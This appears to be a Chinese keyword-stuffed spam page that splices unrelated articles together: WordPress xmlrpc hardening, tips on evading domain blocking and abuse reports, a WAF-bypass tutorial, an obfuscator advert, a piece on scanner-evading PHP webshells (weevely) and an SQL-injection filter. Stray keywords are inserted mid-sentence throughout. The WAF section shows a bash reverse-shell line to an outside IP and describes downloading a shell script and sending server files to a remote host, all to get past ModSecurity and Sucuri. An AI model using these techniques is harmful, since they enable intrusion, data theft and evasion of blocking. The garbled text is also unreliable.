1.WordPress:解决xmlrpc.php被扫描爆破的码防风险
2.如何预防域名网站拦截防止域名拦截举报
3.WAF绕过技术系列文章(二)
4.SourceGuardian代码混淆工具V114官方版SourceGuardian代码混淆工具V114官方版功能简介
5.php一句话木马代码(一句话木马免杀php)
6.我的网站phpweb程序的,打开网站会跳转到赌博站,拦截首页文件没有问题,代码要怎么解决,码防
WordPress:解决xmlrpc.php被扫描爆破的拦截风险
对于WordPress用户,xmlrpc.php文件常常成为恶意攻击的代码去除源码域名限制目标,尤其是码防那些试图绕过登录失败限制的垃圾攻击。虽然复杂密码能有效抵御,拦截但这种行为会占用大量服务器资源。代码
一种简便的码防防护措施是借助宝塔防火墙,免费版的拦截防火墙可以阻止xmlrpc.php和/wp-json的访问。防火墙规则设置应遵循优先级:首先加入UA白名单,代码然后是码防黑名单,接着是拦截URL关键词拦截、IP地址管理和更严格的代码过滤规则,包括CC防御、禁止境外IP等。确保将你的设备UA添加到白名单,以确保正常访问。
另外,关闭XML-RPC的pingback功能也是一种直接有效的防护手段。在主题的functions.php文件中删除xmlrpc.php的代码,但注意不要删除整个文件,以免导致意外问题。对于服务器配置,Nginx和Apache都提供了跳转选项,其中推荐使用屏蔽XML-RPC功能的方法,因为它更加直接且易于管理。
总的来说,通过上述步骤,可以显著降低xmlrpc.php被扫描爆破的风险,同时保证正常用户的使用体验。
如何预防域名网站拦截防止域名拦截举报
1. 若您的网站被拦截,可能是因为存在木马程序或遭到大量用户举报。解决这些问题后,您可以申请可信网站认证。一旦审核通过,网站通常能恢复正常。2048源码解析0
2. 作为防止屏蔽的策略之一,您可以将网站首页设计成形式,这样的蜘蛛程序就难以抓取,从而达到一定的防屏蔽效果。
3. 您可以利用双空间原理来设置网站。一个空间用于跳转(该空间绑定的域名为主域名),另一个空间绑定如tk等免费域名,并通过设置密码来保护这些域名。这样,即使一个空间被屏蔽,主域名仍能正常使用。
4. 在域名后添加点或代码进行访问。这种方法曾经有效,但随着时间推移,其效果可能减弱。尽管如此,它仍能提供一定程度的防护。
5. 使用高级编程语言(如PHP、.NET)编写网站程序,并进行加密设置。这种方法能够防止屏蔽,但可能会增加网站的运营成本。
WAF绕过技术系列文章(二)
在前面的文章中,我们学习了如何通过通配符绕过WAF规则,特别是使用问号通配符。但是,绕过WAF的方法远不止于此。对于不同的攻击,WAF规则绕过方法各不相同。例如,在SQL注入中,你可以利用注释语法来绕过WAF,而不仅仅是简单的加号。
当目标网站的WAF防御级别较低时,星号和连字符能帮你成功绕过WAF。但这只适用于SQL注入,不能用于本地文件包含和远程命令执行。如何查看lsp源码对于某些特殊场景,WAF很难真正防御住针对目标网站的远程命令执行,因为这种攻击使用了字符串连接符。
如果你想实际操作这些绕过方法,可以在我创造的FluxCapacitor手动练习,这是一个在hackthebox上的漏洞演示虚拟机。
在许多编程语言中,字符串连接通常通过二进制符号实现。例如,加号,"Hello, " + "World"得到值为"Hello, World"。在其他编程语言中,连接符可能是不同符号,特别是涉及到隐式的类型转换,并不会使用加号等符号。例如在Perl和PHP中连接符为.,在Lua等语言中,连接符为..
但是你可别认为这是连接两个字符串的唯一方式。
当你在Bash使用C,C++,Python等编程语言时,你可以利用一种基于Bash的字符串连接特性,即:两个相邻的字符串即使中间没有任何符号,它们也可被当作连接在一起,"Hello," "World"等同于"Hello, World"。这个特性不仅适用于printf和echo等命令,还可适用于整体Bash语法。让我们从简单的例子开始。
下面的所有命令运行结果相同:
从上我们可以清楚了解到Bash中的字符串连接特性。实际上,'te's't'是由三个字符串组成:字符串te、字符串s和字符串t。这种语法可以有效地绕过基于“字符串匹配”的WAF规则。
ModSecurity中的防御规则SecRule ARGS "@pm passwd shadow groups"…将拦截所有包含字符串passwd或字符串shadow的请求。但是,如果我们把它们转换成pa'ss'wd或sh'ad'ow呢?就像我上面所提到的那样。而且,你不仅可以使用连接字符串来代替文件参数,还可以用来代替执行路径!安卓排班源码
下面的所有命令运行结果也相同:
现在,我们已经发现一个远程命令执行的绕过WAF方法。如果你面临的WAF存在基于敏感字符串的拦截,你就可以用它绕过WAF规则:
下面我会用PHP代码做些测试,像往常一样,目标WAF是sucuri WAF和ModSecurity。如下是我们的网页代码,当然,它显得太过简单,功能主要是利用curl和system()形成一个命令执行场景。虽然它看起来很不靠谱,但奇怪的是,你可以在多个实际应用场景发现这种愚蠢的代码。
我想我在发布这些文章后,Sucuri会立马把我拉黑。但是,我发誓:我使用Sucuri waf与ModSecurity进行比较,不是因为我要说明哪个更好。因为Sucuri被广泛使用,如果有用户阅读了本文,就可以在他们的自己的Web应用上更好地进行安全测试。
首先,我尝试发出请求获取 google.com,而使用最原始地请求:
如预期的一样,返回了 google.com的页面,基于地理位置,让我跳转到 www.google.de:
现在,为了做坏事,我使用分号破坏curl语法,尝试执行其他系统命令。但是当我试图读取/etc/passwd文件时,Sucuri就会拦截请求,请求如下:
被Sucuri拦截的原因如下:“检测到一个RFI/LFI攻击”。我认为(只是一个假设)Sucuri的这个拦截使用了类似于我们上面所提及的“字符串匹配”技术,它可能会拦截所有常见的路径和文件名,如/etc/passwd。当我把这个WAF的wireshark 2.4源码git拦截力度调到最低时,我就可以利用两个单引号来绕过!
我知道你现在在想什么:“就算你可以读取passwd文件又怎样……你可以绕过Sucuri WAF得到一个shell吗?”这个问题的答案当然是,YES!唯一的问题就是我们不能使用netcat,因为它还没有安装。
返回一个shell的最简单方法是使用bash -i命令:bash -i >& /dev/tcp/1.1.1.1/ 0>&1,但不幸的是,它太复杂了,很难彻底绕过WAF,这同时也意味着很难使用一些php、perl或python代码来获得shell。Sucuri WAF频繁拦截了我的请求,原因是:检测到模糊攻击。
接下来,我尝试使用curl或wget命令将python的反弹shell脚本上传上去,以获得shell。shell.py代码如下:
然后,我们在本机使用python -c SimpleHTTPServer或php -s等搭建Web服务,方便目标服务器从中下载python文件,下载shell.py文件用以下语法:
好的,Sucuri Waf没有拦截这个请求,但是ModSecurity通常会拦截这类请求,为了要绕过这类WAF规则,可以使用wget+ip转换+字符串连接来达成:
第一个命令使用wget下载shell文件到/tmp/。第二个命令使用chmod修改其可执行权限,第三个命令是执行它。如您所见,wget命令发出的请求中没有指明文件名,因此被下载的文件被命名为index.html。你可以使用netcat 命令nc手动写入HTTP的响应头和内容主体来决定文件内容,如下所示:
接下来,我们要绕过更难的WAF
你可能认为我们可以用上面的技术绕过OWASP核心规则集的低级规。但是,这是不可能的。因为有两个小东西叫做normalizePath和cmdLine。在ModSecurity中,它们被称为“转换函数”,用于将用户输入的原始数据先转换,然后再匹配。如果WAF认为数据无害,才会发送原始数据到Web服务器。
normalizePath:它会删除字符串中的多个斜杠、目录的自引用和目录的上级引用(除了最开始的输入)。
cmdLine:由Marc Stern开发,会将所有的输入规范化,例如/e't'c/pa'ss'wd会被转换规范为/etc/passwd。总之它可以做很多事:
因为cmdLine,WAF规则就可以拦截所有利用字符串连接来进行远程命令执行的尝试,拦截信息如下:
现在我不能读取/etc/passwd,但不要绝望!OWASP核心规则集会拦截常用的文件路径和命令,但它不能对目标应用的源代码执行拦截。我虽然不能使用分号(这意味着我不能跳出curl语法),但我可以使用curl来提取文件并将其发送到远程服务器。以上方法可绕过0到3级别的防御。
主要方法是利用POST的HTTP请求将文件发送到远程服务器,命令如下:
在此基础上,我们把@编码为%:
如果防御等级为4,以上这些都不起作用,因为payload中的连字符、正斜杠等字符会引起拦截。但好消息是,防御级别4在生产环境中很少见。
上面所述的绕过技术同样也可以应用于反斜杠字符。反斜杠不是用来串联字符串,而是用来转义:
以上就是全部内容。谢谢!
来源: WAF绕过技术系列文章(二)|NOSEC安全讯息平台 - NOSEC.ORG
白帽汇从事信息安全,专注于安全大数据、企业威胁情报。
公司产品:FOFA-网络空间安全搜索引擎、FOEYE-网络空间检索系统、NOSEC-安全讯息平台。
为您提供:网络空间测绘、企业资产收集、企业威胁情报、应急响应服务。
SourceGuardian代码混淆工具V官方版SourceGuardian代码混淆工具V官方版功能简介
大家好,关于SourceGuardian(代码混淆工具) V1. 官方版,SourceGuardian(代码混淆工具) V1. 官方版功能简介这个很多人还不知道,现在让我们一起来看看吧!SourceGuardian是个专业的编程代码混淆工具,使用它就能防止你辛辛苦苦写的脚本代码被别人所轻易的修改。此工具的原理是通过将PHP源代码编译成字节码格式,然后进行层层加密来保护你的PHP脚本,锁定你的脚本,使其只能在预定义的IP地址、域名或局域网硬件地址上运行。
功能介绍
新的GUI界面和命令行编码器我们为 SourceGuardian 创建了一个新的 GUI,包括 Windows、Linux 和 Mac OS X。 这个新的图形用户界面与强大的命令行编码器相结合,使您的PHP脚本加密更加容易。
支持的PHP版本SourceGuardian .4 for PHP 可与以下版本的 PHP 配合使用。PHP 4, PHP 5 和 PHP 7。 完全支持 PHP 7.1、7.2、7.3 和 7.4。在PHP编码器中,我们一直领先于支持最新版本的PHP。
锁定受保护的脚本,使其只能在线运行可将自定义文本添加到生成的许可证文件中。
您现在可以只对上次编码会话后更改的文件进行编码。
支持PHP 4、PHP 5、PHP 7,包括所有新的语言功能。
线程安全支持。 SourceGuardian有一个特殊版本的加载器,适用于线程安全PHP安装。
HTML模板和其他非php文件的编码我们增加了一个选项,让您可以使用 SourceGuardian 编码器对 HTML 模板或其他非 PHP 文件进行编码。HTML模板或其他非PHP文件可以通过编码器进行编码,然后从受保护的脚本代码中读取和解密。作为项目的一部分被编码的模板文件只能从作为同一项目的一部分被编码的保护脚本中使用。不可能使用未编码的脚本或在不同的SourceGuardian项目中编码的脚本的保护模板。
内置支持为了使我们的客户和潜在客户更容易,我们已经在您的应用程序中添加了内置支持。 现在,您不用担心我们的邮件会被拦截--我们所有的交流都可以在应用程序中看到。 我们也通过电子邮件和服务台提供支持,但这样您可以直接在SourceGuardian中看到您的支持得到了回复。
跨平台编码在一个操作系统下编码的脚本可以在任何其他支持的操作系统下运行。目前我们有Windows、Linux和Macintosh的编码器。受保护的脚本可以在Windows、Linux、OSX、FreeBSD上运行。
特色说明
对于较大的项目,SourceGuardian for PHP 提供了一个选项来保护整个项目,这样所有在项目中使用的脚本只能与其他受保护的脚本一起工作。这样脚本可能会从一个未受保护的脚本中包含一个受保护的脚本,这又增加了一个保护级别。
改进了对特定域名的加密锁定。域名被用作加密密钥的一部分,因此受保护的脚本可能无法从另一个域解密和运行。这是非常强大的。
软件改进了对IP地址的加密锁定。这与域名锁定类似,但IP地址被用作加密密钥的一部分。这意味着受保护的脚本不能被解密并从另一个IP地址运行。锁定整个PHP项目,如果用未加密的脚本代替其他脚本,或者用另一个SourceGuardian安装的脚本进行加密,那么受保护的脚本将无法运行。这对于保护PHP项目中的设置、密码等是非常理想的。
php一句话木马代码(一句话木马免杀php)
一句话木马免杀php
今天给大家分享使用kali下的weevely生成一个php一句话weevely是kali下的一款菜刀替代工具。
使用weevely生成的shell免杀能力很强,并且使用的是加密的连接,可以很轻松突破一些安全防护软件
大多脚本查杀产品的原理
很多产品的脚本木马查杀技术都很相似,基本上是从两个地方查杀。
1.网络请求内容
假设1.php是一个脚本木马,我们输入的字符都将会被当作脚本执行,如果请求参数的值中存在某些危险函数、或者关键字,那么会被防护产品拦截,并且查杀文件。
在网络这块我们可以采用编码、加密传输指令。这样就不会被防护软件检测到。
使用方法
是密码,後面是路径
生成成功后来测试一下是否免杀
这里是我测试的是护卫神
其他能否免杀自测吧
把一句话上传的服务器上后使用以下命令连接
因为和本地文件同名我把名字改成了ms.php
直接执行cmd命令
如此一来我们的木马就可以逃避网络请求内容匹配。
说道文件内容的查杀,一般都是采用正则表达式,它的效率是很高的,效果也不错,但是遇到奇葩的文件、或者匹配不到的对象,查杀软件都会把查杀目标当作正常文件。
当匹配到目标中存在可疑的内容、或者关键字的时候,会进行报警、隔离等操作,黑客技术攻防入门书籍《网络黑白》某宝有售。
这里的安全区域指的是我们平常正常运行的项目或者代码,并且基本的查杀软件都可以查杀到,但是能够被执行的代码区域是比安全区域大很多的,这就意味着没有绝对的安全,攻击与防御是相对的。早期的这类产品并没有预测性,不会去主动搜集攻击行为、可疑样本。
我的网站phpweb程序的,打开网站会跳转到赌博站,首页文件没有问题,要怎么解决,
网站被黑客攻击篡改了内容,说明你的网站存在很多安全隐患,网站漏洞之类的,就算登录服务器找到源文件修复了,也会被黑客再次入侵,所以只有把网站的所有漏洞、以及后门找出来进行修复,防止黑客的攻击,避免网站安全事故发生,造成网站被挂马、网页内容被篡改、数据泄露等,也可以找专业的网站安全公司来解决百度风险拦截的问题,国内也就Sinesafe和绿盟等网站安全公司比较专业。
php防止sql注入示例分析和几种常见攻击正则
1. 函数 `customError` 用于处理错误,将自定义错误输出并停止脚本执行。
2. 设置了错误处理函数 `customError`,它将捕捉并处理 E_ERROR 级别的错误。
3. `$getfilter`、`$postfilter` 和 `$cookiefilter` 变量定义了正则表达式模式,用于检测恶意的 SQL 注入尝试。
4. 函数 `StopAttack` 用于阻止潜在的 SQL 注入攻击。它检查通过 GET、POST 和 COOKIE 传递的参数。
5. 如果 `$_REQUEST['securityToken']` 未设置,且参数值与定义的模式匹配,`StopAttack` 函数将记录攻击日志并终止脚本执行。
6. `slog` 函数用于记录日志,将日志信息追加到 `log.htm` 文件中。
注意:这段代码虽然是为了防止 SQL 注入而设计的,但它使用了正则表达式来过滤参数,这可能会对合法输入造成误拦截。在实际应用中,更推荐使用参数化查询和准备语句来防止 SQL 注入。